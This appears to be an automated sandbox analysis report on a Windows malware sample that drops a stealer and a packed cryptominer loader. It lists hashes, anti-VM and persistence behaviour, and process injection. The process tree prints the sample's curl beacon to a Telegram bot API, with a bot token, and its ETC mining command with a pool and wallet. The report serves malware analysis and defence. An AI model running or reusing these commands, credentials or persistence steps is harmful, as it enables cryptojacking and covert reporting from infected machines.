Analysis
-
max time kernel
25s -
max time network
39s -
platform
windows10-2004_x64 -
resource
win10v2004-en-20220113 -
submitted
01-02-2022 17:07
Static task
static1
Behavioral task
behavioral1
Sample
b81f2f2d3c122a53a0c99f0b21e0ff79.exe
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
b81f2f2d3c122a53a0c99f0b21e0ff79.exe
Resource
win10v2004-en-20220113
General
-
Target
b81f2f2d3c122a53a0c99f0b21e0ff79.exe
-
Size
6.9MB
-
MD5
b81f2f2d3c122a53a0c99f0b21e0ff79
-
SHA1
9b7e2b6b3464b5130f05b10f170e07fc8356ad2e
-
SHA256
914cd602a58f69dd35dd207d8128807926a139f27f4d8b7b2b958041783bc10c
-
SHA512
51ca133984ade0dbf6d926185a948c13f421da2dbe23b51bb2df22fd3c4c153de593e993b497f97ea18ae9e4060a14a3cdb537c27bc2922483235d2563402c76
Malware Config
Signatures
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Executes dropped EXE 2 IoCs
Processes:
steal.exe123.exepid process 4596 steal.exe 3584 123.exe -
Processes:
resource yara_rule behavioral2/memory/1532-137-0x0000000140000000-0x000000014274C000-memory.dmp upx -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
123.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 123.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 123.exe -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\123.exe themida C:\Users\Admin\AppData\Local\Temp\123.exe themida behavioral2/memory/3584-134-0x00007FF703C90000-0x00007FF704594000-memory.dmp themida behavioral2/memory/3584-135-0x00007FF703C90000-0x00007FF704594000-memory.dmp themida behavioral2/memory/3584-136-0x00007FF703C90000-0x00007FF704594000-memory.dmp themida -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
123.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RegHost = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\RegHost.exe" 123.exe -
Processes:
123.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 123.exe -
Suspicious use of SetThreadContext 2 IoCs
Processes:
123.exedescription pid process target process PID 3584 set thread context of 1532 3584 123.exe bfsvc.exe PID 3584 set thread context of 4568 3584 123.exe explorer.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious use of WriteProcessMemory 33 IoCs
Processes:
b81f2f2d3c122a53a0c99f0b21e0ff79.exe123.exedescription pid process target process PID 4956 wrote to memory of 4596 4956 b81f2f2d3c122a53a0c99f0b21e0ff79.exe steal.exe PID 4956 wrote to memory of 4596 4956 b81f2f2d3c122a53a0c99f0b21e0ff79.exe steal.exe PID 4956 wrote to memory of 4596 4956 b81f2f2d3c122a53a0c99f0b21e0ff79.exe steal.exe PID 4956 wrote to memory of 3584 4956 b81f2f2d3c122a53a0c99f0b21e0ff79.exe 123.exe PID 4956 wrote to memory of 3584 4956 b81f2f2d3c122a53a0c99f0b21e0ff79.exe 123.exe PID 3584 wrote to memory of 2160 3584 123.exe curl.exe PID 3584 wrote to memory of 2160 3584 123.exe curl.exe PID 3584 wrote to memory of 1532 3584 123.exe bfsvc.exe PID 3584 wrote to memory of 1532 3584 123.exe bfsvc.exe PID 3584 wrote to memory of 1532 3584 123.exe bfsvc.exe PID 3584 wrote to memory of 1532 3584 123.exe bfsvc.exe PID 3584 wrote to memory of 1532 3584 123.exe bfsvc.exe PID 3584 wrote to memory of 1532 3584 123.exe bfsvc.exe PID 3584 wrote to memory of 1532 3584 123.exe bfsvc.exe PID 3584 wrote to memory of 1532 3584 123.exe bfsvc.exe PID 3584 wrote to memory of 1532 3584 123.exe bfsvc.exe PID 3584 wrote to memory of 4568 3584 123.exe explorer.exe PID 3584 wrote to memory of 4568 3584 123.exe explorer.exe PID 3584 wrote to memory of 4568 3584 123.exe explorer.exe PID 3584 wrote to memory of 4568 3584 123.exe explorer.exe PID 3584 wrote to memory of 4568 3584 123.exe explorer.exe PID 3584 wrote to memory of 4568 3584 123.exe explorer.exe PID 3584 wrote to memory of 4568 3584 123.exe explorer.exe PID 3584 wrote to memory of 4568 3584 123.exe explorer.exe PID 3584 wrote to memory of 4568 3584 123.exe explorer.exe PID 3584 wrote to memory of 4568 3584 123.exe explorer.exe PID 3584 wrote to memory of 4568 3584 123.exe explorer.exe PID 3584 wrote to memory of 4568 3584 123.exe explorer.exe PID 3584 wrote to memory of 4568 3584 123.exe explorer.exe PID 3584 wrote to memory of 4568 3584 123.exe explorer.exe PID 3584 wrote to memory of 4568 3584 123.exe explorer.exe PID 3584 wrote to memory of 4568 3584 123.exe explorer.exe PID 3584 wrote to memory of 4568 3584 123.exe explorer.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\b81f2f2d3c122a53a0c99f0b21e0ff79.exe"C:\Users\Admin\AppData\Local\Temp\b81f2f2d3c122a53a0c99f0b21e0ff79.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\steal.exeC:\Users\Admin\AppData\Local\Temp\steal.exe2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\123.exeC:\Users\Admin\AppData\Local\Temp\123.exe2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\curl.execurl "https://api.telegram.org/bot5091596467:AAFHA5degKMEAHZHV4pD9gfMs7VtZ9Z4EBs/sendMessage?chat_id=-1001750796132&text=%F0%9F%99%88 New worker!%0AGPU: Microsoft Basic Display Adapter%0AWorker Tag: ga%0A(Windows Defender has been turned off)"3⤵
-
C:\Windows\bfsvc.exeC:\Windows\bfsvc.exe --algo ETCHASH --pool eu1-etc.ethermine.org:4444 --user 0x7D77fc78A83E9c01b08b33584EccbB71d2dFcA12 --worker g223⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe "qwe1" "Microsoft%20Basic%20Display%20Adapter" "ga" "etc"3⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\123.exeMD5
f18bb590bdf69d8571ad7da70faa921b
SHA147f58cf547153e5fc89165fbd83b118c51793569
SHA2560d276de3a1e7ef5de4f770d84735afacbc771c35118d46e1cecb49d1eedaec69
SHA512fd2052b58297a2a2aa8ebd2a7d85f0abfff7db7fa601c3cebd29198e085e14aeda2615de3a8104112f038c975e1329c1bd4d5542d89bc136eb222e1955933817
-
C:\Users\Admin\AppData\Local\Temp\123.exeMD5
f18bb590bdf69d8571ad7da70faa921b
SHA147f58cf547153e5fc89165fbd83b118c51793569
SHA2560d276de3a1e7ef5de4f770d84735afacbc771c35118d46e1cecb49d1eedaec69
SHA512fd2052b58297a2a2aa8ebd2a7d85f0abfff7db7fa601c3cebd29198e085e14aeda2615de3a8104112f038c975e1329c1bd4d5542d89bc136eb222e1955933817
-
C:\Users\Admin\AppData\Local\Temp\steal.exeMD5
231147ca2fbb27db182411c726d9489e
SHA1540fac37b19f2361973f3771a9ce4453dd1d370f
SHA2569bee06359c7817269767dc482760caeb14644b9607bce3231bf6d1760342fb28
SHA512a5c0b320f292fd60c4556cf3c04d399cc17ce941dbee9aabc4b03d7f396a9a59c7212e818220f641223161605f73bf0d28010ea0bc1ed7e4306c1ef983dd7691
-
C:\Users\Admin\AppData\Local\Temp\steal.exeMD5
231147ca2fbb27db182411c726d9489e
SHA1540fac37b19f2361973f3771a9ce4453dd1d370f
SHA2569bee06359c7817269767dc482760caeb14644b9607bce3231bf6d1760342fb28
SHA512a5c0b320f292fd60c4556cf3c04d399cc17ce941dbee9aabc4b03d7f396a9a59c7212e818220f641223161605f73bf0d28010ea0bc1ed7e4306c1ef983dd7691
-
memory/1532-137-0x0000000140000000-0x000000014274C000-memory.dmpFilesize
39.3MB
-
memory/3584-134-0x00007FF703C90000-0x00007FF704594000-memory.dmpFilesize
9.0MB
-
memory/3584-135-0x00007FF703C90000-0x00007FF704594000-memory.dmpFilesize
9.0MB
-
memory/3584-136-0x00007FF703C90000-0x00007FF704594000-memory.dmpFilesize
9.0MB
-
memory/4568-138-0x0000000140000000-0x000000014002A000-memory.dmpFilesize
168KB